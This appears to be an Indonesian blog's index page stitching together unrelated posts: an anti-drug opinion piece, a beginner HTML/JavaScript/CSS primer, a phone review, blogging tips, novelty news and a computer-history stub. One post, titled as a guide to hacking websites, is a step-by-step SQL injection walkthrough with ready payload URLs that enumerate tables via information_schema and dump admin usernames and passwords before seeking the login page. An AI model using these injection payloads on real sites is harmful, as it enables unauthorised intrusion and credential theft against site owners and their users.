bandar narkoba telah
merusak generasi bangsa
dengan menggunakan zat-
zat narkotik yang merusak tatanan kemanusiaan,
kejahatan ini akan
mengakibatkan kerusakan
pada generasi bangsa.

apapun alasanya kita harus
menolak keras terhadap
pemberian grasi terhadap pelaku ini, ada fenomena
yang menarik mengapa
indonesia menjadi pangsa
pasar narkoba yang strategis. Hukum di negeri ini begitu lembek, dan mudah di suap menjadikan pelaku narkoba dengan mudah masuk dalam negeri ini.

Apalah artinya Granat atau
LSM yang sejenisnya kalau
tidak ada upaya dukungan
pemerintah dan perangkat
hukumnya mampu membuat rasa jera terhadap pelaku narkoba. jangan sampai pemberantasan narkoba hanya terlihat sesaat padahal kita tidak tahu di dalamnya ada gunung es yang mempunyai setumpuk masalah terhadap generasi bangsa.

Selamatkan generasi bangsa, bangsa ini sudah terpuruk jauh karena kejahatan para koruptor, hukuman mati bagi bandar narkoba dan koruptor memang layak, kejahatan mereka sudah merusak tatanan bangsa dan sendi-sendi kehidupan. kalau ada yang berpendapat hukuman mati bertentangan dengan UUD dan HAM, apa buktinya..? bukankah mereka banyak merusak dan melanggar Hak orang lain.

untuk menyelamatkan satu
anak bangsa dari jeratan
narkoba membutuhkan
biaya jutaan, coba anda
bayangkan kalau hampir
semua anak generasi bangsa menjadi kecanduan barang ini, pemerintah akan
bangkrut karena harus
membiayai pengobatan
mereka, penyakit mayarakat
ini harus segera di atasi, kalau tidak maka siap-siap saja negeri ini akan kehilangan satu generasi yang sangat berharga.

www.bagussajiwo.blogdetik.com/2012/10/17/selamatkan-generasi-bangsa-dari-bahaya-narkoba/

[Read More...]


Apa Itu HTML, JavaScript, dan Css



HTML
singkatan dari Hyper Text Markup Language adalah file teks atau file ASCII yang berisi instruksi/script kepada web browser untuk menampilkan suatu tampilan grafis dari sebuah halaman web. Didalam file HTML terdapat beberapa "tag" atau kode-kode yang dimengerti oleh web browser dan dapat menampilkannya di layar monitor.
File HTML dapat dibuat dengan aplikasi text editor apapun di sistem operasi apapun, antara lain : Notepad di Windows, emasc atau vi di Unix atau SimpleText di Macintosh. File HTML ini juga bisa dibuat di aplikasi word processor apapun asalkan saat menyimpan file tersebut disimpan dengan format text-only.
Salah satu kelebihan file HTML adalah cross platform, artinya file HTML dapat ditampilkan di beberapa Operating System (OS) yang berbeda dan memiliki tampilan yang sama walaupun saat pembuatannya menggunakan satu OS tertentu saja.

JavaScript

Sejak pertengahan 1990-an, JavaScript telah menjadi bagian dari pengembangan web, kala itu Netscape memperkenalkan versi ke 2 dari browser Netscape Navigator miliknya.
Java merupakan Object Oriented Programming (OOP) language diperkenalkan oleh James Gosling dari Sun Microsystems. JavaScript diperkenalkan oleh Netscape. JavaScript merupakan sepupu jauhnya Java. JavaScript juga berbasiskan OOP. Struktur pemrograman keduanya hampir sama.
Menambah JavaScript ke dalam dokumen HTML sangatlah mudah, yang perlu dilakukan adalah dengan memasukkan kode JavaScript dalam blok pembuka dan penutup <script>. Contoh:
Tag ‘script’ memiliki satu atribut yang penting: language. Atribut ini berguna untuk menentukan bahasa scripting apa yang digunakan. Biasanya, nilainya adalah JavaScript atau JavaScript1.0, JavaScript1.1, JavaScript1.2, dan lain-lain. Dengan menentukan angka versi dari JavaScript yang digunakan, kita memberitahu browser bahwa script ini hanya bisa berjalan di browser yang mendukung versi dari JavaScript yang kita tentukan. Tanpa itu, setiap browser yang mendukung JavaScript akan mencoba untuk menjalankan script tersebut.
Contoh, berikut adalah penggalan lengkap JavaScript :
Untuk memasukkan suatu script JavaScript ke dalam dokumen HTML cukup mudah, kita tinggal menaruh kode JavaScript di posisi mana saja, bisa di antara tag head, di antara tag body, maupun di bawah tag body penutup.
Kode di atas berfungsi untuk menampilkan tulisan ‘hai’ ke dalam halaman web. Jika kode di atas disimpan dengan format .HTML kemudian dijalankan lewat browser, maka akan tampil kata ‘hai’ dalam halaman tersebut. (Google syntax highlighter belum di update, sehingga tulisan hai muncul setelah tag script penutup. 
Seperti kebanyakan bahasa pemrograman lainnya, JavaScript juga mendukung penulisan variabel. Variabel bisa berarti tempat penyimpanan, tempat di mana kita bisa menyimpan data dan juga mengambil data hanya dengan menyebutkan nama lokasi tempat penyimpanannya.
Untuk mendeklarasikan suatu variabel, cukup menggunakan perintah var :
var variabelPertama;
var variabelKedua;
VariabelPertama dan variabelKedua sudah dideklarasikan, tetapi kita belum memasukkan nilai apapun ke dalam kedua variabel tersebut. Untuk memasukkan suatu nilai ke dalam variabel variabelPertama dan variabelKedua, gunakan sintaks kode berikut:
variabelPertama = “Selamat pagi”;
variabelKedua = “budi”;
Untuk menggabungkan string dalam VariabelPertama dengan VariabelKedua, kita gunakan tanda PLUS (+) :
Hasilnya : Selamat pagi budi
Perhatikan pada kode di atas: tanda <!– dan tanda // –> digunakan untuk menyembunyikan script JavaScript kita. Pada browser yang tidak mendukung penggunaan JavaScript, script tersebut di atas tidak akan dieksekusi. Sehingga seringkali kita akan menggunakan <noscript> untuk memberitahu user, bahwa browser yang digunakan tidak mendukung JavaScript atau dukungan JavaScript tidak diaktifkan.

 CSS

 

 


 

 

 

 

 

CSS adalah kependekan dari Cascading Style Sheet ,pengertiannya adalah sekumpulan code pemrograman web yang berfungsi untuk mengendalikan beberapa komponen didalam web sehingga menjadi tampak seragam,berstruktur dan teratur.CSS inilah yang bertanggung jawab atas penampilan web anda  dimata pengunjung melalui browser internet.
CSS yang buruk bisa membuat visitor Anda tidak kerasan lagi menjelajahi blog anda,apalagi untuk kembali lagi.
Memaksimalkan CSS adalah penting (khususnya) blog agar lebih nyaman untuk dibaca dilihat oleh visitor anda dan kalau bisa bikin lah CSS yang meringankan loading.



Jika anda tertarik untuk mengedit tampilan template blog sendiri,maka mengerti CSS adalah wajib.Namun ingat,untuk menjadi seorang blogger tidak wajib untuk mengerti CSS karena banyak template yang bisa didapat dari desainer blog.Tapi tak ada salahnya kan mengerti sedikit saja?.....karena menggunakan tampilan blog hasil desain sendiri itu dapat memberikan kepuasan tersendiri.


Pengenalan Dasar penulisan CSS


Untuk pengenalan dasar CSS,kita wajib mengetahui apa itu yang namanya ;


  • Selector
  • Properti
  • Deklarasi
  • Nilai/Values

Contoh penulisan code  CSS

body {background-color: white;}

body adalah sebagai Selector
background-color adalah Properti
white adalah Nilai/values

Deklarasi adalah bagian yang berada didalam "{  }" yaitu properti dan nilai


Selector adalah bagian atau elemen yang ingin kita atur stylenya.
Properti adalah komponen yang kita butuhkan
Nilai/value adalah nilai dari deklarasi yang kita inginkan

Segitu saja dasar CSS,untuk lebih lanjut,nanti kita akan mengenal apa saja code yang bisa dimasukkan kedalam golongan properti,selector ataupun Nilai untuk postingan berikutnya.

Metode yang dipakai dalam penggunaan CSS

Inline style sheet metode
Penulisan atribut css langsung kedalam code HTML yang dimaksud

Contoh:

<div align="center" style="background="white;"> Ini adalah bagian yang diatur stylenya</div>


Embeded style sheet
Penulisan CSS dengan mendefinisikan dulu didalam sebuah tag
<style type="text/css">code CSS</style> yang dipasang sebelum tag </head>
Pada pendefinisian ini disebutkan atribut-atribut CSS yang akan digunakan untuk tag-tag HTML, yang selanjutnya dapat digunakan oleh tag HTML yang bersangkutan.

Contoh:

<html>
<head>
<title>Title halaman</title>
<style>
body {background:#0000FF; color:#FFFF00;}
h1 {font-size:18px; color:#FF0000}
p {font-size:12px; font-family:arial; text-indent:0.5in}
.header-wrapper{margin:0 auto;border 1px solid #cccccc;}
</style>
</head>
<body>
<div class="header-wrapper">komponen header</div>
<h1>Judul psotingan ini berukuran 18 dengan warna merah!</h1>
<p>Artikel /paragraf ada disini berukuran 12</p>
</body>
</html>

Menurut sifatnya CSS itu memiliki 2 sifat yaitu CSS external dan CSS internal adalah CSS yang ditulis secara langsung didalam halaman web yang disesain.Jika anda membuat dua halaman web yang berstyle sama ,maka dihalaman yang kedua kita juga memasukkan code css yang sama

CSS external adalah CSS yang ditulis didalam berkas style.css dan diletakkan ditempat khusus atau bahkan diluar dari situs tersebut.
Berkas CSS itu bersxtensi css,bisa di beri nama yang memudahkan untuk diingat,misalnya cssku-page1.css.
Rumor mengatakan bahwa css external itu lebih meringankan loading blog?...saya kurang tahu pasti.Tergantung pilihan anda,lebih suka cara yang mana..

Cara penulisan code pemanggilan css  adalah
<link href="http://situsku.com/style/cssku.css" rel="stylesheet" type="text/css" media="screen"></link>




 

[Read More...]


Spesifikasi Hp Sunberry S77



Pada saat ini, beragam cara untuk menarik minat pengguna telah dijalankan oleh banyak vendor. Salah satunya adalah dengan menghadirkan ponsel yang memiliki bentuk dan fitur khusus, seperti ponsel game yang berbentuk layaknya game portable khas Sony PSP (PlayStation Portable). Untuk ponsel dengan rancangan serupa layaknya perangkat game portable tersebut, pasar ponsel Indonesia sebelumnya telah menawarkan IMO W8800, IMO P800, IT Mobile V318, Micxon IX3 Supernova, Venera ego 808, L-Star LS-11 dan Extreme Hepi. Bagi para penggemar ponsel game lokal, kini pasar ponsel di Indonesia kembali menawarkan satu ponsel game baru bernama SunBerry S77. Simak ulasan singkat ponsel SunBerry S77 tersebut untuk mengetahui spesifikasi yang ditawarkannya.
Hadir dengan struktur bodi yang agak memanjang dan layar dengan ukuran yang cukup luas, SunBerry S77 menawarkan para calon penggunanya pengalaman bermain game melalui layar sentuh berukuran 2.8 inci. Ponsel yang tidak dilengkapi dengan keypad alfanumerik konvensional tersebut menghadirkan tombol game atau gamepad untuk memanjakan penggunanya sewaktu bermain game, sama dengan yang ditawarkan oleh ponsel game lainnya.
Untuk permainan yang disediakan, SunBerry S77 menghadirkan NES Game (Nintendo Entertainment System), ROM game telah tertanam di dalam kartu memori. Namun jika pengguna kurang puas dengan game yang disediakan, pengguna dapat menggunakan kanal data GPRS yang merupakan kanal akses internet untuk mencari ROM game NES lain.
Namun ternyata fitur game bukanlah satu-satunya yang ditawarkan oleh SunBerry S77, karena ponsel tersebut juga menghadirkan beberapa fasilitas hiburan menarik lainnya seperti TV Analog, MP3/MP4 player, radio FM serta kamera. Kemampuan Dual On sebagai fitur khas ponsel lokal juga kembali ditawarkan dengan hadirnya 2 slot kartu SIM. Untuk fitur konektivitas tambahan, ponsel yang dibanderol dengan harga sekitar Rp 600 ribuan tersebut menawarkan Bluetooth dan port kabel data yang dapat menjadikan slot kartu microSD layaknya ruang penyimpanan eksternal.

Berikut adalah spesifikasi dan fitur SunBerry S77:
Jaringan: Dualband GSM (900/1800 MHz) & Dual On; Layar: 2.8 inci, TFT Touchscreen QVGA; Transfer data: GPRS; Kamera: Ada; Memori eksternal: microSD; Messaging: SMS, MMS; Konektivitas: Bluetooth, kabel data, Audio jack 3.5mm; Browser: WAP; Fitur lain: Polifonik (MP3), TV Analog, MP3/MP4 player, radio FM, Big Speaker, NES Game, Facebook, Chatting aplication, Calendar, calculator, alarm, speakerphone; Baterai: Lithium ion

http://www.ponsel.org/ponsel-dengan-rancangan-ala-sony-psp-sunberry-s77/
[Read More...]


Tips Untuk Blogger Pemula



1. Jangan Ikut-Ikutan
Blogger sekarang cenderung mengikuti trend yang sedang booming. Well, kalau masih dalam tema yang sama namun isi postingannya berbeda masih tidak apa-apa. Namun jika mengusung tema yang sama dan isi postingannya sama persis alias 100% copas ya sama saja bohong. 
Jika kamu baru masuk kedunia blog, usahakan mengetahui isi dari blog yang kamu bahas. Contohnya begini, jika blog kamu membahas tentang dunia otomotif, tentunya kamu harus mengetahui dasar-dasar yang terdapat di dalam dunia otomotif itu sendiri walaupun sedikit. Namun yang paling bagus adalah Jadi diri sendiri, artinya apa yang ingin kamu tulis di postingan, tulis dan nyatakanlah. Jangan cuma ikut-ikutan blog lain, karena itu tidak bisa membuat kamu berkembang.

2. Memperhatikan Tata Cara Penulisan
Menggunakan tata cara yang baik, sopan dan benar akan menarik perhatian pembaca blog kamu. Penulisan yang baik pun akan dapat mudah di mengerti oleh pengunjung blog kamu. Mungkin pada awalnya sulit untuk menulis dengan tata penulisan yang baik, namun seiring dengan banyaknya kamu berlatih menulis dan seringnya kamu membaca postingan-postingan di blog orang lain yang  bermanfaat, akan membuat tata cara penulisan kamu semakin baik. 

3. Jangan Ragu Untuk Belajar
Maksudnya adalah jangan ragu untuk "mencuri" ilmu dari orang lain. Di dunia ini tidak ada seorang pun yang lahir dengan kepintaran dan kecerdasa. Semuanya membutuhkan proses dan waktu yang cukup lama. Jika kamu menemukan artikel yang bermanfaat di blog orang lain, janganlah ragu untuk mempelajarinya atau lebih bagus lagi bertanya kepada sang pemilik blog. Karena dengan bertanya akan membuka wawasan-wawasan lainnya dan memberikan kamu ilmu yang bermanfaat. Dan setelah selesai mempelajarinya, jangan lupa juga untuk menerapkannya, kalau bertanya dan sudah mengerti, lalu tidak di implementasikan maka hasilnya pun akan nihil.

4. Menggunakan Gambar yang Menarik
Jika biasanya mengambil gambar dari google, usahakanlah untuk menggunakan gambar kita sendiri. Apalagi gambar yang kita tampilkan di blog kita berkualitas bagus, tentunya akan menarik pengunjung serta pembaca untuk berlama-lama di blog kita.

5. Menulis Untuk Pembaca Bukan Untuk Mesin Pencari
Tidak ada yang meragukan untuk membuat blog menjadi terkenal adalah dengan melakukan berbagai macam optimasi. Namun bukankah kita masuk kedunia blog ini untuk dibaca oleh para pembaca ? bukan untuk si google ?. Well, pasti kamu juga pernah melihat blog yang isinya cuma biasa-biasa saja namun memiliki banyak pengunjung. Namun apa yang mereka berikan pastinya akan sia-sia, lagipula pengunjung yang datang pun hanya akan sekali-sekali datangnya. Dan juga siapa yang ingin datang lagi ke blog yang isinya cuma sampah ?
Fokuslah untuk memanjakan pembaca blog, bukan untuk meminta-minta dan mengikuti keinginan search engine. Jika postingan yang kamu hasilkan bernilai tinggi, maka google, bing dan yahoo lah yang akan menuruti kamu dan mencintai blog kamu.

6. Optimalkan Media Sosial
Kamu yang masih awam dunia blog akan lebih baik menggunakan media sosial seperti facebook, twitter, pinterest dll, untuk menjaring pembaca-pembaca kamu. Promosi blog di SocMed akan lebih mudah dilakukan blogger pemula. Dan tentunya akan menarik pengunjung untuk datang ke blog kamu.
7. Interaksi Dengan Sesama Blogger
Ini juga hal yang penting, sesama blogger adalah bersaudara, entah itu tua, muda, yang sudah lama atau yang masih baru, Walaupun menggunakan platform blog yang berbeda-beda mereka semua adalah sama, yakni sebagai blogger. Cobalah berinteraksi dengan blog lain, sekedar mengisi buku Cbox atau lebih bagus lagi berkomentar. Dengan berkomentar antar blog tentunya akan membangun chemistry antar blogger itu sendiri. Semakin banyak berinteraksi, semakin banyak pula pembaca yang kamu dapatkan.

8. Nge-blog Dari Hati
Inilah salah satu inti dari blog itu sendiri. Mulai lah blog dari dalam hati dengan keseriusan namun dengan pembawaan yang santai. Nge-blog itu bukan pembawa berita yang terkesan kaku, jika kamu memiliki cerita yang menarik, informatif yang bisa kamu bagikan kepada pembaca, maka bagikanlah tentunya hal ini akan memberikan manfaat bagi blogger lainnya dan juga kamu.

Sumber: http://hzndi.blogspot.com/2012/09/8-tips-untuk-blogger-pemula.html
[Read More...]


Inilah Motor Yang Tidak Bisa Jatuh



Lit Motors’ C-1 Motor Yang Tidak Bisa Jatuh

 Bagi kita yang tinggal di kota-kota padat penduduk, motor adalah pilihan alat transportasi yang lebih efisien dan efektif dibandingkan mobil. Tapi mobil tetap unggul dari sisi kenyamanan karena pengemudinya terlindung dari hujan dan tak perlu repot dengan masalah keseimbangan. Adakah kendaraan yang memiliki kenyamanan setingkat mobil tapi tetap lincah dan efisien seperti motor? Saat ini belum, tapi tahun 2014 nanti, kendaraan inilah yang akan menjawab seluruh permasalahan itu.




C-1 adalah skuter elektrik produksi Lit Motors’. Kendaraan ini memiliki dua roda seperti motor dan kasing seperti mobil. Yang menarik, kendaraan listrik ini dilengkapi gyroscope agar tetap seimbang dan tidak jatuh. Bahkan ketika diseruduk mobil sekalipun. Skuter ini larinya kencang juga lho, bisa digeber hingga kecepatan maksimum 190km/jam.
Kelihatannya memang kendaraan yang sempurna, tapi tetap saja skuter ini punya beberapa kelemahan. Seperti kapasitasnya yang cuma muat untuk satu orang dan harganya yang selevel dengan harga mobil ($12,000 – $16,000). Belum lagi kendaraan ini menggunakan full tenaga listrik, sehingga rasanya masih bakal repot untuk dipakai di Indonesia dalam waktu dekat.
Jika pengembangannya berjalan lancar, skuter ini seharusnya sudah beredar pada tahun 2014 nanti.(**)

Video: 

sumber:http://uniknya.com/2012/09/08/uniknya-lit-motors-c-1-motor-yang-tidak-bisa-jatuh/
[Read More...]


Cara Hacking Website Dengan Teknik SQL Injection



Pengertian SQL InjectionSQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.



Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
[Read More...]


5 Situs Tutorial Pemrograman Berbahasa Indonesia



yang mau belajar pemrograman tapi bingung nyari tutornya, ngga usah khawatir... karena di Indonesia banyak kok situs-situs yang membahas tentang pemrograman. Nah berikut 5 Situs Tutorial Pemrograman Berbahasa Indonesia yang mungkin bisa jadi referensi sobat.

Berikut 5 Situs Tutorial Pemrograman Berbahasa Indonesia :

http://cirebon-cyber4rt.blogspot.com/2012/07/5-situs-tutorial-pemrograman-berbahasa.html

1. Ilmukomputer.com
Download berbagai materi kuliah untuk jurusan ilmu komputer/IT, di situs ini disediakan e-book-e-book siap download hasil tulisan dari para penulis-penulis yang mengirimkan tutorialnya. Materi yang dapat dikirimkan adalah semua materi yang ada di dalam jurusan Ilmu Komputer.

Untuk situsnya, bisa dikunjungi di http://ilmukomputer.com/

2. Jagocoding.com
Jagocoding.com adalah situs tutorial pemrograman pertama di Indonesia yang berbasis jejaring sosial (social network). User dapat membuat tutorial dan mempublikasikannya di internet secara langsung, dengan approval dari administrator untuk memenuhi standar kelayakan tutorial. Fitur lainnya adalah, user yang telah terdaftar dapat memfollow kontributor, memberikan komentar, diskusi, dan sebagainya. User dapat mengunduh/download ebook setiap tutorial dalam bentuk PDF. Tutorial yang disajikan adalah semua tutorial pemrograman, mulai dari web, desktop, maupun mobile.

Untuk situnya, bisa dikunjungi di http://jagocoding.com/

3. Makkul.com
Makkul.com adalah sebuah blog yang berisi artikel mengenai PHP dan MySQL,Java,ASP disertai dengan penjelasan dan contoh kasus. User yang tidak terdaftar dapat memberikan komentar, tetapi tidak bisa memposting tutorial sendiri. Karena sebenarnya ini adalah blogspot dengan artikel-artikel berisi tutorial pemrograman.

Untuk situsnya, bisa dikunjungi di http://makkul.com/

4. Myphptutorials.com
Situs yang berisi semua tutorial PHP beragam. Walaupun intinya adalah tutorial PHP, tetapi sebenarnya yang dipelajari di sini adalah semua tutorial tentang bagaimana membuat website, jadi dipelajari juga CSS, Javascript, dan sebagainya. Intinya, di sini adalah tutorial web, tidak terdapat mobile dan desktop.

Untuk situsnya, bisa dikunjungi di http://www.myphptutorials.com/

5. Ilmuwebsite.com
Ilmuwebsite.com hampir mirip dengan situs myphptutorials.com. Pada situs ini berisi tutorial-tutorial semua yang berkaitan dengan website, dengan disediakan demo dan link download. Website ini sebenarnya adalah wordpress, jadi tidak ada halaman login untuk user. User tidak bisa interaksi terhadap user lain.

Untuk situsnya, bisa dikunjungi di http://www.ilmuwebsite.com/
[Read More...]


Nama-nama Rumah Makan Paling Pasaran di Indonesia



Setelah sekian lama saya tidak mengurus blog ini, akhirnya punya kesempatan juga ngisi blog yang kecil ini.
Pada kesempatan kali ini saya akan mempost tentang Nama-nama Rumah Makan Paling Pasaran di Indonesia, okelah ga usa banyak basa basi, nanti ngga bisa dimakan lagi... hehe


Rumah makan adalah bisnis
yang tidak akan mati. Orang
akan selalu butuh makanan
dan dengan demikian akan

selalu ada orang yang berpikir untuk menjual makanan. Mungkin karena
saking banyaknya orang
yang menjual makanan,
lama-lama orang jadi
bingung mau ngasih nama
rumah makannya apa dan langsung berpikir, "ah tailah, namanya apa aja deh". Hal ini menyebabkan
munculnya beberapa nama
yang jadi standart banget di
dunia perumah-makanan. Berikut adalah nama-nama
rumah makan paling
standart.

5. Yang Pake Angka Hoki (88 / 99)
Digunakan Oleh: Restoran seafood, chinese food.

Makna dari nama itu: Angka 88 ataupun 99 adalah angka hoki. Dengan demikian, si pemilik restoran berharap
restorannya akan membawa hoki sehingga laku keras dan Ia menjadi kaya raya.

4. Yang Pake Atribut Tubuh (Pak Kumis / Si Gondrong)
Digunakan Oleh: Warung bakso, tukang nasi goreng.

Makna dari nama itu: Supaya kamu gampang
mengenali penjualnya. Tapi
mengingat berkumis
maupun gondrong itu
sebenernya gak spesial-
spesial amat, sebenernya hal ini cukup membuat rancu
yah. Harusnya kalo bikin
kayak gini tuh pake atribut
tubuh yang sangat spesifik
gitu lho, seperti misalnya
Nasi Goreng si Kaki Nanah atau Warung Bakso si Udel
Bodong.

3. Sudi Mampir
Digunakan oleh: Warung Sop Kaki Kambing, Warteg /
warung nasi.

Makna dari nama itu: Supaya kamu mau mampir
dan mencoba hidangan
mereka. Tapi kalo kamu gak
sudi gimana ya? Ya udah.
Yeee.

2. Berkah
Digunakan oleh: Warteg / warung nasi, warung ayam
goreng, nasi goreng.

Makna dari Nama Itu: Agar memberi berkah bagi
mereka dan kamu semua
yang makan. Eh,
sebenernya lebih berkah ke
yang punya restoran/
warung sih. Kamu mah itungannya tetep buang
duit untuk makan. Siapa
suruh makan.

1. Sederhana
Digunakan oleh: Restoran Padang, nasi uduk, warteg,
apapun yang merasa
restorannya 'sederhana'.

Makna dari Nama Itu: Ceritanya rendah hati gitu.
Kan kalo kamu berkunjung
ke rumah temen trus
ditawarin makan suka gitu
kan, "Ayo makan…tapi
seadanya aja ya." Nah, kurang lebih pengen
merendah kayak gitu deh.
Eh, tapi ini bisa juga sebagai
sarana ngeles sih. Jadi kalo
kamu protes karena
makanannya gak enak, mereka bisa bilang, "Yah,
namanya juga hidangan
sederhana mas…"
[Read More...]


Aneh, Ada Batu Yang Mirip Kepala Bayi



Batu mirip kepala bayi yang ada di Garut ini sungguh sangat aneh, sebagian warga percaya bahwa batu kepala ini sering mengeluarkan suara tangisan.

Batu aneh yang mirip kepala ini terletak di daerah ka
wasan obyek wisata Cipanas Tarogong Garut atau berada di kaki gunung Guntur, batu aneh yang mirip dengan kepala bayi ini diberi nama batu menangis oleh warga setempat.

Pemberian nama batu yang mirip dengan kepala bayi ini dengan nama batu menangis ini bukan tanpa alasan sebab bagi sebagian orang di sekitar batu ini sering mendengarkan suara tangisan yang keluar dari batu besar ini. Bukan hanya itu saja sebagian orang juga biasa sering melihat batu ini mengeluarkan air di bagian batu yang mirip seperti mata sehingga seolah olah seperti orang yang sedang menangis yang mengeluarkan air mata.

“Kalau saya memang belum pernah mendengar tapi tetangga lain, pernah mendengar suara tangisan dari
arah batu dan ada warga yang
secara kebetulan melihat batu mengeluarkan air dari arah mata,” ujar salah seorang warga, Ikin (65), Selasa (9/10/2012), kepada wartawan.

Batu ini memang benar benar mirip seperti kepala bayi apalagi jika dilihat dari jauh. Namun batu aneh ini hanyalah sebuah batu besar yang sama seperti batu besar yang ada di wilayah ini.

Wilayah kaki gunung Guntur memang dikenal memiliki banyak batu batu besar akibat dari bekas letusan gunung Guntur sekitar tahun 1800 an.
[Read More...]


Situs Purbakala Ditemukan di Halaman Restoran Cepat Saji



Malang - Situs purbakala ditemukan di halaman sebuah restoran cepat saji di Jalan Mayjen Panjaitan, Kota Malang. Keberadaan situs Ketawang Gede ini berada tepat di belakang restoran
dengan luas empat meter persegi.

Situs itu berdiri dengan seluruh sisi bangunan berdiri dinding setinggi dua meter lengkap dengan atap bangunannya. Memiliki tiga batu besar menyerupai yoni tanpa lingga, sebuah balok batu, dan belasan watu gong yang berfungsi sebagai landasan tiang bangunan yang terbuat dari batu andesit.

"Situs ini diperkirakan dibangun pada 500 tahun sebelum masehi. Berupa sebuah rumah panggung," kata Arkeolog Universitas Negeri Malang Dwi Cahyono kepada wartawan saat meninjau lokasi, Rabu (10/10/2012) sore.

Menurut Dwi, situs ini berdiri lintas masa, yakni masa pra sejarah hingga masa Hindu dan Budha masuk ke Pulau Jawa.

Keberadaan situs itu juga diperkirakan menjadi sebuah bangunan suci di masa Hindu bagi penganut sekte Siwa sebagai candi pemujaan. "Terbukti ditemukannya Arca Ganesha dan nandi yang sekitar kawasan situs," tutur Dwi.

Ia menambahkan, situs ini sempat terdata oleh Repporten Oudhkundige Commissie atau komisi purbakala yang berdiri di zaman kolonial sekitar Tahun 1907 silam. Dan didokumentasikan dalam sebuah buku yang mencatat temuan situs di Jawa dan Bali.

Kemudian, lanjut Dwi, dilakukan pendataan ulang oleh oude kondiger versellag di 1927. Hasil pendataan ulang itu menyebutkan kondisi situs masih tetap utuh tak berubah.

"Di masa kemerdekaan lahan menjadi milik perorangan sehingga sulit untuk ditelusuri kembali," sambung Dwi.
[Read More...]


Sejarah Komputer



Sejarah Komputer dan Perkembanganya – Sejak dahulu, proses pengolahan data telah dilakukan oleh manusia. Manusia juga menemukan alat-alat mekanik dan elektronik untuk membantu manusia dalam penghitungan dan pengolahan data supaya bisa mendapatkan hasil lebih cepat. Komputer yang kita temui saat ini adalah suatu evolusi panjang dari penemuan-penemuan manusia sejak dahulu kala berupa alat mekanik maupun elektronik


Saat ini komputer dan piranti pendukungnya telah masuk dalam setiap aspek kehidupan dan pekerjaan. Komputer yang ada sekarang memiliki kemampuan yang lebih dari sekedar perhitungan matematik biasa. Diantaranya adalah sistem komputer di kassa supermarket yang mampu membaca kode barang belanja, sentral telepon yang menangani jutaan panggilan dan komunikasi, jaringan komputer dan internet yang menghubungkan berbagai tempat di dunia.


Sejarah Komputer menurut periodenya adalah:
Alat Hitung Tradisional dan Kalkulator Mekanik
Komputer Generasi Pertama
Komputer Generasi Kedua
Komputer Generasi Ketiga
Komputer Generasi Keempat
Komputer Generasi Kelima





